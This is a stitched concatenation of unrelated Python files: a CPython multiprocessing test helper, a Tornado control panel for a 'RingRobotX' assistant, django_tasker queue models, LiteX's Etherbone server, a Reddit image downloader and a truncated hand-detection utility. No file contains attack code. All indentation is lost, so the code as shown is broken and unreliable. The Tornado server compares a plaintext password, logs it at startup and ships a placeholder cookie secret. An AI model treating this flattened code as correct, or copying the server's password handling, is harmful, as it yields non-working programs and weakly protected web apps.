test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
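# Typical use (illustrative): a thin per-start-method wrapper module, such as
# CPython's test.test_multiprocessing_fork, imports this module and calls
#     install_tests_in_module_dict(globals(), 'fork')
# which clones every test class into that module once per allowed type.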
|
server.py
|
import time
import func_packages.RingRobotX_Web.server.Websocket
import tornado.ioloop
import tornado.web
import model.config
import model.hook    # used by ChatHandler below
import model.logger  # used by run() below
import threading
import asyncio
import json
import func_packages.RingRobotX_ChatHistory.main
import bcrypt
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
return self.get_secure_cookie("user")
class MainHandler(BaseHandler):
def get(self):
global history
history = None
if not self.current_user:
self.redirect("/login")
return
self.render('index.html')
class StudyHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
self.render('study.html')
class CLIHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
salt = bcrypt.gensalt(rounds=10)
hashed = bcrypt.hashpw(model.config.fastGetConfig("RingRobotX_Web")["password"].encode(), salt)
self.render('cli.html', token=hashed.decode(), port=str(model.config.fastGetConfig("RingRobotX_Web")["websocket_port"]))
class DhHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
self.render('dh.html', history=func_packages.RingRobotX_ChatHistory.main.get_history())
class HistoryHandler(BaseHandler):
def get(self):
if not self.current_user:
res = {'code': 1, 'message': 'illegal visit'}
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(func_packages.RingRobotX_ChatHistory.main.get_history())}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
def get(self):
if not self.current_user:
self.redirect("/login")
return
with open("./log/" + time.strftime("%Y%m%d") + '.log', encoding="utf-8") as file_obj:
contents = file_obj.readlines()
self.render('log.html', log=contents)
class ChatHandler(BaseHandler):
def post(self):
if not self.current_user:
res = {'code': 1, 'message': 'illegal visit'}
print('chl1..........')
else:
global jineng_s_r
query = self.get_argument('query', '')
sc_s = str(query)
if sc_s != '':
model.hook.runhook_fast("RRCore.Model.FuncAction",sc_s,"return")
print('chl3..........')
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
def get(self):
if self.current_user:
self.redirect('/')
return
'''
self.write('<html><body><form action="/login" method="post">'
'Name: <input type="text" name="name"><br/>'
'Password: <input type="password" name="password">'
'<input type="submit" value="Sign in">'
'</form></body></html>')
'''
self.render('login.html')
def post(self):
if model.config.fastGetConfig("RingRobotX_Web")["password"] == self.get_argument('password', default=''):  # can be changed as needed
self.set_secure_cookie("user", self.get_argument("name"))
self.redirect("/")
else:
    self.write('Incorrect username or password, please try again')
settings = {
"cookie_secret": "__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
"template_path": "./func_packages/RingRobotX_Web/server/template",
"static_path": "./func_packages/RingRobotX_Web/server/static",
}
def make_app():
return tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/study", StudyHandler),
(r"/dh", DhHandler),
(r"/history", HistoryHandler),
(r"/chat", ChatHandler),
(r"/log", GetLogHandler),
(r"/cli",CLIHandler)
], **settings)
app = make_app()
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
app.listen(model.config.fastGetConfig("RingRobotX_Web")["listen_port"])
tornado.ioloop.IOLoop.current().start()
def run():
threading.Thread(target=start_server).start()
func_packages.RingRobotX_Web.server.Websocket.run()
model.logger.moduleLoggerMain.info("[Server] Backend started at localhost:" + str(model.config.fastGetConfig("RingRobotX_Web")["listen_port"]) + "\n Password: " + model.config.fastGetConfig("RingRobotX_Web")["password"])
def hread(readlog_r):
global readlog_s_r
readlog_s_r = readlog_r
|
models.py
|
# coding=utf-8
import json
import logging
import random
import signal
from datetime import datetime, timedelta
from enum import IntEnum
from itertools import chain
from threading import Thread
from time import sleep
import six
from django.conf import settings
from django.db import DatabaseError
from django.db import models
from django.db import transaction
from django.db.utils import IntegrityError
from django.utils import timezone
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as __, ugettext_lazy as _
from django_tasker.exceptions import RetryLaterException
logging = logging.getLogger(__name__)
class ChoicesIntEnum(IntEnum):
"""Extends IntEum with django choices generation capability"""
@classmethod
def choices(cls):
return [(item.value, __(item.name.replace("_", " ").capitalize())) for item in cls]
@classmethod
def values(cls):
return [item.value for item in cls]
class QueueStatus(ChoicesIntEnum):
enabled = 0
disabled = 1
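# Illustrative examples of the helpers above (the labels depend on the active
# translation; shown here for the default English locale):
#   QueueStatus.choices() == [(0, 'Enabled'), (1, 'Disabled')]
#   QueueStatus.values() == [0, 1]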
class TaskWorker(object):
def __init__(self, queue):
self.queue = queue
self._stop_requested = False
self.back_off_seconds = None
self.run_count = 0
self.cleanup_rate = self.queue.rate_limit or 5000
def __call__(self):
logging.info("Worker booting for queue: %s", self.queue)
while True:
if self._stop_requested:
logging.info('Stopping on request')
break
self.run_once()
def run_once(self):
queue = self.queue
try:
logging.debug("run_once: %s", self.queue)
if self.run_count % self.cleanup_rate == 0:
queue.retry_busy_timeouts()
empty_run = queue.process_batch()
except Exception as ex:
self.back_off_seconds = queue.on_error_back_off(self.back_off_seconds, ex)
else:
self.back_off_seconds = None
if empty_run:
seconds = getattr(settings, 'TASKER_SLEEP_TIME', 60)
logging.debug("Queue %s had empty run, it will sleep for %s seconds", queue.name, seconds)
sleep(seconds)
def request_stop(self):
self._stop_requested = True
@classmethod
def run_queues(cls, queue_names):
logging.info("Running workers for queues: %s if they are enabled", queue_names)
qry = TaskQueue.objects.filter(status=QueueStatus.enabled)
if queue_names:
qry = qry.filter(name__in=queue_names)
workers = [cls(q) for q in qry]
threads = [Thread(target=w) for w in workers]
for t in threads:
t.start()
cls.setup_signals(workers)
@classmethod
def setup_signals(cls, workers):
def request_workers_stop(signum, frame):
logging.info("Warm shut down requested: %s", signum)
for w in workers:
w.request_stop()
# TODO: handle signals correctly
signal.signal(signal.SIGINT, request_workers_stop)
signal.signal(signal.SIGTERM, request_workers_stop)
signals_to_names = {}
for n in dir(signal):
if n.startswith('SIG') and not n.startswith('SIG_'):
signals_to_names[getattr(signal, n)] = n
for s, name in sorted(signals_to_names.items()):
handler = signal.getsignal(s)
if handler is signal.SIG_DFL:
handler = 'SIG_DFL'
elif handler is signal.SIG_IGN:
handler = 'SIG_IGN'
print('%-10s (%2d):' % (name, s), handler)
class TaskQueue(models.Model):
name = models.CharField(max_length=100, default='default', unique=True)
rate_limit = models.PositiveSmallIntegerField(null=True, blank=True, help_text='Maximum number of tasks to run per hour')
status = models.PositiveSmallIntegerField(default=QueueStatus.enabled, choices=QueueStatus.choices())
back_off_base_seconds = models.PositiveSmallIntegerField(default=60)
back_off_max_seconds = models.PositiveIntegerField(default=86400)
back_off_multiplier = models.FloatField(default=4)
busy_max_seconds = models.PositiveIntegerField(default=3600)
def __init__(self, *args, **kwargs):
super(TaskQueue, self).__init__(*args, **kwargs)
if self.rate_limit:
self.time_interval = timedelta(seconds=3600 / self.rate_limit)
def __str__(self):
return "TaskQueue:{}:{}.{}".format(self.pk, self.name, self.get_status_display())
def process_batch(self, limit=100):
batch = list(self.get_batch(limit))
random.shuffle(batch)
empty_run = True
for pk in batch:
empty_run = False
start = datetime.now()
if TaskInfo.process_one(pk):
self.throttle(datetime.now() - start)
return empty_run
def get_batch(self, limit, flat=True):
return chain(*[self._get_one_batch(limit, target_id, flat) for target_id in self.targets])
def _get_one_batch(self, limit, target_id, flat=True):
logging.debug("limit: %s on target_id = %s", limit, target_id)
qry = TaskInfo.objects.filter(eta__lte=timezone.now(), status__in=(TaskStatus.queued, TaskStatus.retry), target_id=target_id)
# qry = qry.order_by('eta') # Ordering seems to introduce performance issues
if flat:
qry = qry.values_list('id', flat=True)
return qry[:limit]
@property
def targets(self):
if not hasattr(self, '_targets'):
self._targets = list(TaskTarget.objects.filter(queue=self).values_list('id', flat=True))
return self._targets
def throttle(self, duration):
if self.rate_limit:
wait = self.time_interval - duration
if wait > timedelta():
logging.debug("Throttle limiting for seconds: %s", wait.total_seconds())
sleep(wait.total_seconds())
def on_error_back_off(self, seconds, ex):
if seconds is None:
seconds = self.back_off_base_seconds
else:
seconds *= self.back_off_multiplier
logging.error("Work failed on %s, backing off for %s seconds", self.name, seconds, exc_info=ex)
sleep(min(seconds, self.back_off_max_seconds))
return seconds
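# With the TaskQueue defaults below (base 60s, multiplier 4, cap 86400s), the
# sleep progression on repeated failures is roughly:
#   60, 240, 960, 3840, 15360, 61440, 86400, 86400, ...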
def retry_busy_timeouts(self):
logging.debug("retry_busy_timeouts: %s", self)
when = timezone.now() - timedelta(seconds=self.busy_max_seconds)
rows = TaskInfo.objects.filter(ts__lte=when, status=TaskStatus.busy, target_id__in=self.targets).update(status=TaskStatus.retry)
if rows:
logging.info("Retrying busy %s timeouts in %s queue", rows, self)
return rows
@six.python_2_unicode_compatible
class TaskTarget(models.Model):
name = models.CharField(max_length=100, unique=True)
queue = models.ForeignKey(TaskQueue, on_delete=models.CASCADE)
max_retries = models.PositiveSmallIntegerField(default=5)
def __str__(self):
return self.name
class TaskStatus(ChoicesIntEnum):
created = 0
queued = 1
eager = 2
retry = 3
busy = 4
success = 5
error = 6
corrupted = 7
@six.python_2_unicode_compatible
class TaskInfo(models.Model):
created = models.DateTimeField(auto_now_add=True)
executed = models.DateTimeField(blank=True, null=True)
ts = models.DateTimeField(auto_now=True, db_index=True)
retry_count = models.PositiveSmallIntegerField(default=0, db_index=True)
eta = models.DateTimeField(null=True, blank=True, db_index=True)
target = models.ForeignKey(TaskTarget, db_index=True, on_delete=models.CASCADE)
payload = models.CharField(max_length=300, null=True, blank=True)
status = models.IntegerField(default=TaskStatus.created, choices=TaskStatus.choices(), db_index=True)
status_message = models.TextField(default=None, blank=True, null=True)
name = models.CharField(max_length=300, null=True, blank=True, unique=True)
class Meta:
index_together = (
('status', 'eta'), # Used by TaskQueue.get_batch
('status', 'eta', 'target'), # Used by TaskQueue.get_batch
('status', 'ts'), # Used by TaskQueue.retry_busy_timeouts
('status', 'eta', 'target', 'id'),
# ('id', 'eta', 'status'),
# ('id', 'target'),
# ('id', 'target', 'status', 'eta'),
('target', 'eta'), # TaskInfo.is_unique?
('target', 'status'),
)
def __str__(self):
return "TaskInfo:{}:{}:{}:{}:{}".format(self.pk, self.get_status_display(), self.target, self.retry_count, self.eta)
@classmethod
def setup(cls, target, instance, queue='default', rate_limit=None, countdown=0, eta=None, max_retries=5, name=None):
logging.debug("method.__name__: %s", target.__name__)
now = timezone.now()
eta = eta or (now + timedelta(seconds=countdown))
target_name = cls.get_target_name(target, instance)
target = TaskTarget.objects.filter(name=target_name).first()
if target is None:
queue, created = TaskQueue.objects.get_or_create(name=queue, defaults={'rate_limit': rate_limit})
target, created = TaskTarget.objects.get_or_create(name=target_name, defaults={'queue': queue, 'max_retries': max_retries})
eager = getattr(settings, 'TASKER_ALWAYS_EAGER', None)
task = cls(target=target, eta=eta, status=TaskStatus.eager if eager else TaskStatus.queued, name=name)
task.instance = instance
return task
@staticmethod
def get_target_name(target, instance):
instance = instance or getattr(target, '__self__', None)
# class methods will have __self__ set with class
if instance and not isinstance(instance, type):
target_name = '.'.join((instance.__module__, instance.__class__.__name__, target.__name__))
else:
target_name = '.'.join((target.__module__, target.__qualname__))
return target_name
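# Illustrative example (hypothetical names): for a bound method of a model
# instance, TaskInfo.get_target_name(user.notify, user) yields something like
# 'myapp.models.User.notify'; for a plain function or classmethod it falls
# back to '<module>.<qualname>'.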
def queue_once(self, *args, **kwargs):
"""Queue this task only if another similar task does not exits already"""
payload = self._get_payload(args, kwargs)
if self.is_unique(payload):
return self._queue_payload(payload)
def is_unique(self, payload):
assert self.pk is None, "Checking for uniqueness is not supported for saved tasks"
return not TaskInfo.objects.filter(
eta=self.eta,
target=self.target,
payload=payload,
).exists()
def queue(self, *args, **kwargs):
payload = self._get_payload(args, kwargs)
return self._queue_payload(payload)
def _queue_payload(self, payload):
self.payload = payload
try:
self.save()
except IntegrityError as ex:
if ex.args and ex.args[0] == 'UNIQUE constraint failed: django_tasker_taskinfo.name':
logging.info("Duplicate task name not saved: %s", self)
return self
if self.status == TaskStatus.eager:
self.execute()
return self
def _get_payload(self, args, kwargs):
payload = {}
if args:
payload['args'] = args
if kwargs:
payload['kwargs'] = kwargs
if isinstance(self.instance, models.Model):
assert hasattr(self.instance, 'pk'), "Model instance must have a 'pk' attribute, so task can store it for retrieval before execution"
pk = getattr(self.instance, 'pk')
assert pk is not None, "Model instance must be saved and have a 'pk' value, before it's method can be queued. Alternatively you can use queue a classmethod without pk set"
payload['pk'] = pk
return json.dumps(payload) if payload else None
def execute(self):
logging.info("Executing task : %s", self)
try:
target, args, kwargs = self.prepare_call()
self._execute_call(target, args, kwargs)
except Exception as ex:
logging.warning("{} execution failed".format(str(self)), exc_info=ex)
self.error(self.get_error_status_message(ex), status=TaskStatus.corrupted)
logging.info("Executing complete : %s", self)
def _execute_call(self, target, args, kwargs):
try:
with transaction.atomic():
target(*args, **kwargs)
except RetryLaterException as ex:
self.retry(ex)
except Exception as ex:
self.error(ex)
else:
self.success()
def prepare_call(self):
payload = json.loads(self.payload) if self.payload else {}
args = payload.get('args', [])
kwargs = payload.get('kwargs', {})
pk = payload.get('pk', None)
where, target = self.target.name.rsplit('.', 1)
where = import_string(where)
if pk:
where = where.objects.get(pk=pk)
target = getattr(where, target)
return target, args, kwargs
@classmethod
def process_one(cls, pk):
logging.debug("process_one: %s", pk)
rows = cls.objects.filter(pk=pk, status__in=(TaskStatus.queued, TaskStatus.retry)).update(status=TaskStatus.busy)
if rows < 1:
return
task = cls.objects.get(pk=pk)
task.execute()
return task
def success(self):
self.status = TaskStatus.success
self.executed = timezone.now()
self.save()
def retry(self, ex, status=TaskStatus.retry):
# This is a task controlled retry, it does not count toward max_retries
# if a task wants to retry indefinitely we will not object
if getattr(settings, 'TASKER_ALWAYS_EAGER', None):
logging.error("Failing permanently on task in eager mode", exc_info=ex)
# there is no point in retrying this in eager mode, it will fail each time
return
logging.warning("Retrying on task request", exc_info=ex)
self.eta = ex.eta
self.status_message = self.get_error_status_message(ex)
self.status = status
self.save()
def error(self, ex, status=TaskStatus.error):
logging.error("{} execution failed".format(str(self)), exc_info=True)
self.status = status
self.status_message = self.get_error_status_message(ex)
self.retry_count += 1
if self.retry_count <= self.target.max_retries:
self.status = TaskStatus.retry
countdown = get_retry_countdown(self.retry_count)
self.eta = timezone.now() + timedelta(seconds=countdown)
else:
logging.error("Exceed max_retries on task %s", self, exc_info=ex)
self.save()
# noinspection PyMethodMayBeStatic
def get_error_status_message(self, ex):
return str(ex)
def get_retry_countdown(retries):
return {
0: 30,
1: 60,
2: 300,
3: 1200,
}.get(retries, 3600)
|
litex_server.py
|
#!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2021 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2019 Sean Cross <sean@xobs.io>
# Copyright (c) 2018 Felix Held <felix-github@felixheld.de>
# SPDX-License-Identifier: BSD-2-Clause
import argparse
import os
import sys
import socket
import time
import threading
from litex.tools.remote.etherbone import EtherbonePacket, EtherboneRecord, EtherboneWrites
from litex.tools.remote.etherbone import EtherboneIPC
# Read Merger --------------------------------------------------------------------------------------
def _read_merger(addrs, max_length=256, bursts=["incr", "fixed"]):
"""Sequential reads merger
Take a list of read addresses as input and merge the sequential/fixed reads into (base, length, burst) tuples:
Example: [0x0, 0x4, 0x10, 0x14, 0x20, 0x20] input will return [(0x0,2, "incr"), (0x10,2, "incr"), (0x20,2, "fixed")].
This is useful for UARTBone/Etherbone, where the command/response roundtrip delay accounts for
most of the access time; merging minimizes the number of commands by grouping them into UARTBone
packets.
"""
assert "incr" in bursts
burst_base = addrs[0]
burst_length = 1
burst_type = "incr"
for addr in addrs[1:]:
merged = False
# Try to merge to a "fixed" burst if supported
if ("fixed" in bursts):
# If current burst matches
if (burst_type in [None, "fixed"]) or (burst_length == 1):
# If addr matches
if (addr == burst_base):
if (burst_length != max_length):
burst_type = "fixed"
burst_length += 1
merged = True
# Try to merge to an "incr" burst if supported
if ("incr" in bursts):
# If current burst matches
if (burst_type in [None, "incr"]) or (burst_length == 1):
# If addr matches
if (addr == burst_base + (4 * burst_length)):
if (burst_length != max_length):
burst_type = "incr"
burst_length += 1
merged = True
# Generate current burst if addr could not be merged
if not merged:
yield (burst_base, burst_length, burst_type)
burst_base = addr
burst_length = 1
burst_type = "incr"
yield (burst_base, burst_length, burst_type)
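# Quick illustration (mirrors the docstring example above):
#   list(_read_merger([0x0, 0x4, 0x10, 0x14, 0x20, 0x20]))
#   -> [(0x0, 2, 'incr'), (0x10, 2, 'incr'), (0x20, 2, 'fixed')]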
# Remote Server ------------------------------------------------------------------------------------
class RemoteServer(EtherboneIPC):
def __init__(self, comm, bind_ip, bind_port=1234):
self.comm = comm
self.bind_ip = bind_ip
self.bind_port = bind_port
self.lock = False
def open(self):
if hasattr(self, "socket"):
return
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SO_REUSEADDR"):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT"):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
self.socket.bind((self.bind_ip, self.bind_port))
print("tcp port: {:d}".format(self.bind_port))
self.socket.listen(1)
self.comm.open()
def close(self):
self.comm.close()
if not hasattr(self, "socket"):
return
self.socket.close()
del self.socket
def _serve_thread(self):
while True:
client_socket, addr = self.socket.accept()
print("Connected with " + addr[0] + ":" + str(addr[1]))
try:
while True:
try:
packet = self.receive_packet(client_socket)
if packet == 0:
break
except Exception:
break
packet = EtherbonePacket(packet)
packet.decode()
record = packet.records.pop()
# Wait for lock
while self.lock:
time.sleep(0.01)
# Set lock
self.lock = True
# Handle writes:
if record.writes is not None:
self.comm.write(record.writes.base_addr, record.writes.get_datas())
# Handle reads
if record.reads is not None:
max_length = {
"CommUART": 256,
"CommUDP": 1,
}.get(self.comm.__class__.__name__, 1)
bursts = {
"CommUART": ["incr", "fixed"]
}.get(self.comm.__class__.__name__, ["incr"])
reads = []
for addr, length, burst in _read_merger(record.reads.get_addrs(),
max_length = max_length,
bursts = bursts):
reads += self.comm.read(addr, length, burst)
record = EtherboneRecord()
record.writes = EtherboneWrites(datas=reads)
record.wcount = len(record.writes)
packet = EtherbonePacket()
packet.records = [record]
packet.encode()
self.send_packet(client_socket, packet)
# release lock
self.lock = False
finally:
print("Disconnect")
client_socket.close()
def start(self, nthreads):
for i in range(nthreads):
self.serve_thread = threading.Thread(target=self._serve_thread)
self.serve_thread.daemon = True
self.serve_thread.start()
# Run ----------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="LiteX Server utility", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Common arguments
parser.add_argument("--bind-ip", default="localhost", help="Host bind address.")
parser.add_argument("--bind-port", default=1234, help="Host bind port.")
parser.add_argument("--debug", action="store_true", help="Enable debug.")
# UART arguments
parser.add_argument("--uart", action="store_true", help="Select UART interface.")
parser.add_argument("--uart-port", default=None, help="Set UART port.")
parser.add_argument("--uart-baudrate", default=115200, help="Set UART baudrate.")
# JTAG arguments
parser.add_argument("--jtag", action="store_true", help="Select JTAG interface.")
parser.add_argument("--jtag-config", default="openocd_xc7_ft232.cfg", help="OpenOCD JTAG configuration file.")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
# UDP arguments
parser.add_argument("--udp", action="store_true", help="Select UDP interface.")
parser.add_argument("--udp-ip", default="192.168.1.50", help="Set UDP remote IP address.")
parser.add_argument("--udp-port", default=1234, help="Set UDP remote port.")
parser.add_argument("--udp-scan", action="store_true", help="Scan network for available UDP devices.")
# PCIe arguments
parser.add_argument("--pcie", action="store_true", help="Select PCIe interface.")
parser.add_argument("--pcie-bar", default=None, help="Set PCIe BAR.")
# USB arguments
parser.add_argument("--usb", action="store_true", help="Select USB interface.")
parser.add_argument("--usb-vid", default=None, help="Set USB vendor ID.")
parser.add_argument("--usb-pid", default=None, help="Set USB product ID.")
parser.add_argument("--usb-max-retries", default=10, help="Number of USB reconecting retries.")
args = parser.parse_args()
# UART mode
if args.uart:
from litex.tools.remote.comm_uart import CommUART
if args.uart_port is None:
print("Need to specify --uart-port, exiting.")
exit()
uart_port = args.uart_port
uart_baudrate = int(float(args.uart_baudrate))
print("[CommUART] port: {} / baudrate: {} / ".format(uart_port, uart_baudrate), end="")
comm = CommUART(uart_port, uart_baudrate, debug=args.debug)
# JTAG mode
elif args.jtag:
from litex.tools.litex_term import JTAGUART
from litex.tools.remote.comm_uart import CommUART
jtag_uart = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
jtag_uart.open()
print("[CommUART] port: JTAG / ", end="")
comm = CommUART(os.ttyname(jtag_uart.name), debug=args.debug)
# UDP mode
elif args.udp:
from litex.tools.remote.comm_udp import CommUDP
udp_ip = args.udp_ip
udp_port = int(args.udp_port)
if args.udp_scan:
udp_ip = udp_ip.split(".")
assert len(udp_ip) == 4
udp_ip[3] = "x"
udp_ip = ".".join(udp_ip)
comm = CommUDP(udp_ip, udp_port, debug=args.debug)
comm.open(probe=False)
comm.scan(udp_ip)
comm.close()
exit()
else:
print("[CommUDP] ip: {} / port: {} / ".format(udp_ip, udp_port), end="")
comm = CommUDP(udp_ip, udp_port, debug=args.debug)
# PCIe mode
elif args.pcie:
from litex.tools.remote.comm_pcie import CommPCIe
pcie_bar = args.pcie_bar
if pcie_bar is None:
print("Need to speficy --pcie-bar, exiting.")
exit()
print("[CommPCIe] bar: {} / ".format(pcie_bar), end="")
comm = CommPCIe(pcie_bar, debug=args.debug)
# USB mode
elif args.usb:
from litex.tools.remote.comm_usb import CommUSB
if args.usb_pid is None and args.usb_vid is None:
print("Need to speficy --usb-vid or --usb-pid, exiting.")
exit()
print("[CommUSB] vid: {} / pid: {} / ".format(args.usb_vid, args.usb_pid), end="")
pid = args.usb_pid
if pid is not None:
pid = int(pid, base=0)
vid = args.usb_vid
if vid is not None:
vid = int(vid, base=0)
comm = CommUSB(vid=vid, pid=pid, max_retries=int(args.usb_max_retries), debug=args.debug)
else:
parser.print_help()
exit()
server = RemoteServer(comm, args.bind_ip, int(args.bind_port))
server.open()
server.start(4)
try:
    while True:
        time.sleep(100)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
|
main.py
|
import time
import os
import threading
import urllib.request
import json
import sys
import config
import praw
from slugify import slugify
from imgurpython import ImgurClient
reddit = praw.Reddit(client_id=config.client_id, client_secret=config.client_secret, user_agent=config.user_agent)
reddit.read_only = True # might not be needed at all.
client = ImgurClient(config.imgur_client_id, "")
commands = {
"run": "runs the image downloader once.",
"add <sub>": "add sub(s) to the list.",
"removesub <sub>": "remove sub from the list.",
"subs": "shows the subreddit where images are downloaded from.",
"count": "shows the amount of images totally downloaded.",
"exit": "exits the image downloader script.",
"album": "download one album",
"remove <sub>": "remove all images from one specific subreddit",
"suicide": "removes all images in specified folder."
}
filename = 'data.json'
# dumps to json file
def dump(prop, val):
with open(filename) as f:
data = json.load(f)
data[prop] = val
os.remove(filename)
with open(filename, 'w') as f:
json.dump(data, f, indent=4)
# reads from json file
def read(prop):
with open(filename) as json_file:
return json.load(json_file)[prop]
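# Example (illustrative): dump("limit", 25) persists a new per-subreddit fetch
# limit to data.json, and read("limit") returns it on the next run.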
subreddits = read("subs")
if not subreddits:
print("\nYou haven't added any subs yet. Add them by doing \n\n add <sub> \n")
count = read("count")
limit = read("limit")
# save image
def save_img(link, name, sub=''):
global count
ext = '.jpg' if '.jpg' in link else '.png'
#id = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
filename = f"{slugify(name)}_{sub}{ext}"
path = os.path.join(config.path, filename)
try:
urllib.request.urlretrieve(link, path)
except Exception as e:
print(f"Request: {link}: failed: {str(e)}")
return
count += 1
# check if image exists
def img_exists(name, url):
ext = '.jpg' if '.jpg' in url else '.png'
if os.path.isfile(f"{config.path}/{name}{ext}"):
return True
# handles imgur albums
def alb_handler(url, sub=''):  # sub is optional so the 'album' command can pass just a URL
# gets number after 4th '/'
alb_id = url.split("/")[4]
# try getting the album images
try:
imgs = client.get_album_images(alb_id)
except Exception as e:
print(f"album {alb_id} not found")
return
# if the album exists and there are no problems, save the images with save_img()
for x in imgs:
# check if image already exists
if img_exists(slugify(f"{str(x.datetime)}_{sub}"), x.link):
continue
save_img(x.link, str(x.datetime), sub)
# removes all images from specific sub
def removeimages(sub=''):
for _, _, filenames in os.walk(config.path):
for f in filenames:
try:
if sub != '':
if sub in f:
os.remove(f"{config.path}/{f}")
else:
os.remove(f"{config.path}/{f}")
except OSError:
    print(f"{f} is in use, try a little later.")
# the main thread for downloading the images
def img_thread(once=False):
while True:
for sub in subreddits:
try:
for submission in reddit.subreddit(sub).hot(limit=limit):
url = submission.url
if 'reddit.com/r/' in url or 'gifv' in url or 'gif' in url:
continue
if 'reddituploads' in url and '.jpg' not in url and '.png' not in url:
url += ".jpg"
if 'imgur.com/a/' in url or 'imgur.com/gallery/' in url:
alb_handler(url, sub)
continue
if 'imgur' in url and '.jpg' not in url and '.png' not in url:
url += ".jpg"
# check if image exists
if img_exists(f"{slugify(submission.title)}_{sub}", url):
continue
save_img(url, submission.title, sub)
except Exception:
continue
time.sleep(0.1)
dump("count", count)
if once:
break
time.sleep(600)
# removes all images and files in case of emergency D:
def suicide():
removeimages()
# the thread for getting the input commands.
def inp_thread():
global subreddits
global limit
while True:
try:
inp = input("> ")
except EOFError:
os._exit(1)
if inp.startswith("add"):
temp_subreddits = inp.split(" ")[1:]
for sub in temp_subreddits:
subreddits.append(sub)
dump("subs", subreddits)
print(subreddits)
print("Running once...")
img_thread(once=True)
if inp.startswith("removesub"):
temp_subreddit = inp.split(" ")[1]
subreddits.remove(temp_subreddit)
dump("subs", subreddits)
print(subreddits)
if inp.startswith("limit"):
limit = int(inp.split(" ")[1])
dump("limit", limit)
if inp == "count":
print(read("count"))
if inp == "stats":
show_stats()  # note: show_stats() is not defined in this script; assumed to be provided elsewhere
if inp == "subs":
print(subreddits)
if inp == "run":
img_thread(once=True)
if inp.startswith("album"):
alb_url = inp.split(" ")[1]
alb_handler(alb_url)
if inp.startswith("remove"):
sub = inp.split(" ")[1]
removeimages(sub)
if inp == "help":
for k, v in commands.items():
print(f"{k} - {v}")
if inp == "exit":
os._exit(1)
if inp == "suicide":
if input("You sure? (Y/N) ") == "Y":
suicide()
print("RIP.")
else:
continue
# all the thread calls.
if __name__ == "__main__":
t1 = threading.Thread(target=img_thread)
t2 = threading.Thread(target=inp_thread)
t1.start()
t2.start()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.compat.v1.GraphDef()
with tf.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.compat.v1.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
